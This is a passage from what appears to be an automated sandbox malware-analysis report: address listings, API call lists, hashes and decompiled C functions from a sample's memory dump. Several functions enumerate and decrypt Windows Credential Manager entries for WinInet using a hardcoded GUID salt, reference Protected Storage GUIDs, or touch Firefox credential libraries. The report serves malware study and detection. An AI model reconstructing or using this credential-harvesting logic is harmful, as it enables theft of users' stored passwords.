                                                                        0x0040b5b5
                                                                        0x0040b5c3
                                                                        0x0040b5da
                                                                        0x0040b5e2
                                                                        0x0040b5e3
                                                                        0x0040b5e4
                                                                        0x0040b5e5
                                                                        0x0040b5e6
                                                                        0x0040b5ff
                                                                        0x0040b606
                                                                        0x0040b60d
                                                                        0x0040b619
                                                                        0x0040b61b
                                                                        0x0040b61b
                                                                        0x0040b574
                                                                        0x0040b577
                                                                        0x0040b583
                                                                        0x0040b58c
                                                                        0x0040b594
                                                                        0x0040b594
                                                                        0x0040b58c
                                                                        0x0040b577
                                                                        0x00000000

                                                                        APIs
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                        • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                        • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                          • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                          • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                          • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                        • LoadCursorA.USER32 ref: 0040B63A
                                                                        • SetCursor.USER32(00000000), ref: 0040B641
                                                                        • PostMessageA.USER32 ref: 0040B663
                                                                        • SetFocus.USER32(?), ref: 0040B69E
                                                                        • SetFocus.USER32(?), ref: 0040B6EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                        • String ID:
                                                                        • API String ID: 1416211542-0
                                                                        • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                        • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                        • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                        • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy
                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                        • API String ID: 3177657795-318151290
                                                                        • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                        • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                        • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                        • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}















































                                                                        0x00407661
                                                                        0x0040766b
                                                                        0x00407670
                                                                        0x00407674
                                                                        0x0040767f
                                                                        0x00407689
                                                                        0x0040768d
                                                                        0x00407691
                                                                        0x004076a8
                                                                        0x004076a8
                                                                        0x00407693
                                                                        0x0040769f
                                                                        0x0040769f
                                                                        0x004076ac
                                                                        0x004076b4
                                                                        0x004076c3
                                                                        0x004076c3
                                                                        0x004076cf
                                                                        0x004076d3
                                                                        0x004076db
                                                                        0x004076df
                                                                        0x004076e5
                                                                        0x004076f7
                                                                        0x00407709
                                                                        0x0040770e
                                                                        0x00407713
                                                                        0x00407719
                                                                        0x00407719
                                                                        0x00407724
                                                                        0x0040772c
                                                                        0x0040772d
                                                                        0x0040772d
                                                                        0x00407735
                                                                        0x0040773c
                                                                        0x00407743
                                                                        0x0040774b
                                                                        0x00407753
                                                                        0x00407757
                                                                        0x00407763
                                                                        0x00407795
                                                                        0x0040779d
                                                                        0x004077a2
                                                                        0x004077ab
                                                                        0x004077b0
                                                                        0x004077b2
                                                                        0x004077b2
                                                                        0x004077c1
                                                                        0x004077c9
                                                                        0x004077d0
                                                                        0x004077d7
                                                                        0x004077de
                                                                        0x004077e5
                                                                        0x004077ec
                                                                        0x004077f3
                                                                        0x004077f7
                                                                        0x00407801
                                                                        0x00407809
                                                                        0x0040780d
                                                                        0x00407815
                                                                        0x0040781a
                                                                        0x0040781f
                                                                        0x00407821
                                                                        0x00407827
                                                                        0x00407827
                                                                        0x0040783b
                                                                        0x0040783f
                                                                        0x0040783f
                                                                        0x0040784c
                                                                        0x0040784c
                                                                        0x00407851
                                                                        0x0040785d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040785d
                                                                        0x004076e5
                                                                        0x00407863
                                                                        0x00407867
                                                                        0x00407867
                                                                        0x004076ac
                                                                        0x0040787a

                                                                        APIs
                                                                          • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                        • wcslen.MSVCRT ref: 004076C5
                                                                        • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                        • memset.MSVCRT ref: 0040779D
                                                                        • memcpy.MSVCRT ref: 004077C1
                                                                        • wcschr.MSVCRT ref: 00407815
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                          • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                        • String ID: J$Microsoft_WinInet$hyA
                                                                        • API String ID: 2413121283-319027496
                                                                        • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                        • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                        • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                        • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}











                                                                        0x00407a64
                                                                        0x00407a67
                                                                        0x00407a6f
                                                                        0x00407a7a
                                                                        0x00407a84
                                                                        0x00407a88
                                                                        0x00407a8c
                                                                        0x00407bb2
                                                                        0x00407bb8
                                                                        0x00407a92
                                                                        0x00407a97
                                                                        0x00407a9e
                                                                        0x00407aa3
                                                                        0x00407aaa
                                                                        0x00407ab9
                                                                        0x00407ac4
                                                                        0x00407acc
                                                                        0x00407ad0
                                                                        0x00407adc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407ae6
                                                                        0x00407b8a
                                                                        0x00407b8a
                                                                        0x00407b8e
                                                                        0x00407b90
                                                                        0x00407b91
                                                                        0x00407b95
                                                                        0x00407b98
                                                                        0x00407b9d
                                                                        0x00407b9d
                                                                        0x00000000
                                                                        0x00407b8e
                                                                        0x00407aec
                                                                        0x00407afa
                                                                        0x00407b01
                                                                        0x00407b0d
                                                                        0x00407b12
                                                                        0x00407b19
                                                                        0x00407b1d
                                                                        0x00407b22
                                                                        0x00407b30
                                                                        0x00407b3c
                                                                        0x00407b3c
                                                                        0x00407b24
                                                                        0x00407b28
                                                                        0x00407b28
                                                                        0x00407b22
                                                                        0x00407b4b
                                                                        0x00407b53
                                                                        0x00407b54
                                                                        0x00407b5a
                                                                        0x00407b68
                                                                        0x00407b6e
                                                                        0x00407b6e
                                                                        0x00407b84
                                                                        0x00407b84
                                                                        0x00000000
                                                                        0x00407ba0
                                                                        0x00407ba0
                                                                        0x00407ba4
                                                                        0x00407ba8
                                                                        0x00000000
                                                                        0x00407a97

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                        • String ID: 0$6
                                                                        • API String ID: 1757351179-3849865405
                                                                        • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                        • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                        • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                        • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                        • memcpy.MSVCRT ref: 0040EA04
                                                                        • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                        Strings
                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                        • API String ID: 1640410171-2022683286
                                                                        • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                        • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                        • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                        • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E004081B5(void* __eflags, char* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E0040614B(_a4);
				if(_t3 != 0) {
					strcpy(0x4171b8, _a4);
					strcpy(0x4172c0, "general");
					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
					asm("sbb eax, eax");
					 *0x417304 =  ~(_t6 - 1) + 1;
					E00407DC1(0x417308, "charset", 0x3f);
					E00407DC1(0x417348, "TranslatorName", 0x3f);
					return E00407DC1(0x417388, "TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                        0x004081b9
                                                                        0x004081c1
                                                                        0x004081cf
                                                                        0x004081df
                                                                        0x004081f0
                                                                        0x004081f9
                                                                        0x00408208
                                                                        0x0040820d
                                                                        0x0040821e
                                                                        0x00000000
                                                                        0x0040823b
                                                                        0x0040823c

                                                                        APIs
                                                                          • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                        • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                          • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                        • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                        • API String ID: 185930432-2094606381
                                                                        • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                        • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                        • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                        • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040DEA9() {
				int _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t9;

				_t6 = GetModuleHandleA("nss3.dll");
				_t5 = GetModuleHandleA("sqlite3.dll");
				_t3 = GetModuleHandleA("mozsqlite3.dll");
				_t9 = _t3;
				if(_t6 != 0) {
					_t3 = FreeLibrary(_t6);
				}
				if(_t5 != 0) {
					_t3 = FreeLibrary(_t5);
				}
				if(_t9 != 0) {
					return FreeLibrary(_t9);
				}
				return _t3;
			}







                                                                        0x0040debf
                                                                        0x0040dec8
                                                                        0x0040deca
                                                                        0x0040ded4
                                                                        0x0040ded6
                                                                        0x0040ded9
                                                                        0x0040ded9
                                                                        0x0040dedd
                                                                        0x0040dee0
                                                                        0x0040dee0
                                                                        0x0040dee4
                                                                        0x00000000
                                                                        0x0040dee7
                                                                        0x0040deed

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(nss3.dll,73B757D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                        • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                        • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHandleLibraryModule
                                                                        • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                        • API String ID: 662261464-3550686275
                                                                        • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                        • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                        • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                        • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0040E172(char* __edi, char* __esi) {
				void _v267;
				char _v268;
				char* _t15;
				void* _t38;
				char* _t48;

				_t49 = __esi;
				_t48 = __edi;
				if(__esi[1] != 0x3a) {
					_t15 = strchr( &(__esi[2]), 0x3a);
					if(_t15 == 0) {
						_t38 = E004069D2(0, "\\systemroot");
						if(_t38 < 0) {
							if( *__esi != 0x5c) {
								strcpy(__edi, __esi);
							} else {
								_v268 = 0;
								memset( &_v267, 0, 0x104);
								E00406325( &_v268);
								memcpy(__edi,  &_v268, 2);
								__edi[2] = 0;
								strcat(__edi, __esi);
							}
						} else {
							_v268 = 0;
							memset( &_v267, 0, 0x104);
							E00406325( &_v268);
							strcpy(__edi,  &_v268);
							_t8 =  &(_t49[0xb]); // 0xb
							strcat(__edi, _t38 + _t8);
						}
						L11:
						return _t48;
					}
					_push(_t15 - 1);
					L4:
					strcpy(_t48, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                        0x0040e172
                                                                        0x0040e172
                                                                        0x0040e17f
                                                                        0x0040e18a
                                                                        0x0040e193
                                                                        0x0040e1b3
                                                                        0x0040e1b8
                                                                        0x0040e200
                                                                        0x0040e249
                                                                        0x0040e202
                                                                        0x0040e210
                                                                        0x0040e217
                                                                        0x0040e223
                                                                        0x0040e232
                                                                        0x0040e239
                                                                        0x0040e23d
                                                                        0x0040e242
                                                                        0x0040e1ba
                                                                        0x0040e1c8
                                                                        0x0040e1cf
                                                                        0x0040e1db
                                                                        0x0040e1e8
                                                                        0x0040e1ed
                                                                        0x0040e1f3
                                                                        0x0040e1f8
                                                                        0x0040e251
                                                                        0x0040e254
                                                                        0x0040e254
                                                                        0x0040e196
                                                                        0x0040e197
                                                                        0x0040e198
                                                                        0x00000000
                                                                        0x0040e19e
                                                                        0x0040e181
                                                                        0x00000000

                                                                        APIs
                                                                        • strchr.MSVCRT ref: 0040E18A
                                                                        • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                          • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                          • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                          • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                        • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                        • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                        • memset.MSVCRT ref: 0040E1CF
                                                                          • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                          • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                        • memset.MSVCRT ref: 0040E217
                                                                        • memcpy.MSVCRT ref: 0040E232
                                                                        • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                        • String ID: \systemroot
                                                                        • API String ID: 1680921474-1821301763
                                                                        • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                        • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                        • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                        • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E00401A50(char* __edi, int __fp0) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				int _v28;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				int _t79;
				intOrPtr _t80;
				int _t81;
				signed int _t94;
				int _t98;
				int _t100;
				void* _t104;
				void* _t106;
				intOrPtr _t115;
				char _t117;
				char* _t118;
				void* _t119;
				void* _t120;
				int _t122;
				signed int _t123;
				int* _t125;
				int _t159;
				int _t165;

				_t159 = __fp0;
				_t118 = __edi;
				_t125 = (_t123 & 0xfffffff8) - 0x40;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v28 = __fp0;
				_t120 = 0;
				_t106 = _t119;
				_v36 = _t79;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v60 = 0;
				_v40 = 0;
				_v12 = 0x20;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				if(_t79 > 0) {
					do {
						_t117 =  *((intOrPtr*)(_t120 + _t118));
						_v64 = _t117;
						if(_t117 - 0x41 <= 0x19) {
							_v56 = _v56 + 1;
						}
						if(_t117 - 0x61 <= 0x19) {
							_v52 = _v52 + 1;
						}
